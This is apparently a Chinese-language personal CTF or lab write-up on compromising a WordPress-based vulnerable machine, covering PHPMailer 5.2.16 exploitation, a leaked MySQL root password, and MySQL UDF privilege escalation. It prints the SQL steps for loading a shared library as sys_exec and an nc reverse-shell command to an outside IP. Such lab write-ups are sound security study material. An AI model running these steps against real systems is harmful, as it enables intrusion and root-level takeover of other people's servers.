仅做个人学习笔记使用

目录

一、主机发现

二、端口扫描

三、服务版本探测

四、信息收集

1.一直请求资源

2.常规看源码

五、扫目录

六、phpmailer

七、mysql之udf提权

1.信息收集

2.udf提权

3.步骤

---

一、主机发现

二、端口扫描

三、服务版本探测

常规22,80端口。

111这是个没看懂

42689 开放了远程进程调用协议

四、信息收集

1.一直请求资源

和原来一样就是请求了国外某些站点资源，导致了无法正常加载，挂个梯子就行。要是用到burp，就挂两层。

就是个保安公司界面

2.常规看源码

看接口，源码泄露，有无隐藏目录，都无。

五、扫目录

最基本信息就是wordpress建站

1. /vendor

3,4,5个文件都提到了PHPMailer，readme是自述文件，里面介绍了phpmailer是个php的邮件传输的类，。而security则提到了他的历史漏洞。changelog讲述变迁日志。

尝试从phpmailer进行突破

（1）flag1

六、phpmailer

因为从上面文件中可以得知版本是5.2.16，所以这几个都去试一下。

1.40974.py

40974.py是可以用的。对目标路径写入反弹shell文件。

注意： 使用前需要先更改文件内容

（1）改回连地址

（2）写入后门文件路径

（3）目标ip

也可以改个文件名

2.访问触发

3.反弹shell

七、mysql之udf提权

当我们信息收集时，发现有泄露的mysql账号密码，

检查进程时，又发现mysql是以root的属主运行的，所以可以利用mysql来提权，

1.信息收集

root     R@v3nSecurity

2.udf提权

udf的设计初衷是为了方便用户自定义一些函数，方便查询一些复杂的数据，同时也增加了使用udf提权的可能。

攻击者通过编写调用cmd或者shell的udf.dll文件，并且导入到一个指定的文件夹目录下，创建一个指向udf.dll的自定义函数，从而在数据库中的查询就等价于在cmd或者shell中执行命令。

3.步骤

（1）找到kali自带的udf提权链接库文件.so

（2）64.so的传到靶机上

最好放到/tmp下

（3）查看插件路径

show variables like '%plugin%';

（4）通过链接库文件写入数据库

使用系统数据库,创建一个表，写入链接库文件数据。

use mysql；

create table a(line blob);

insert into a values(load_file('/tmp/x.so'));

（5）再将链接库文件写入插件位置

select * from a into dumpfile '/usr/lib/mysql/plugin/x.so';

（6）创建新函数

create function sys_exec returns integer soname 'x.so';

 （7）执行反弹shell

select sys_exec('nc 192.168.0.107 6666 -e /bin/bash');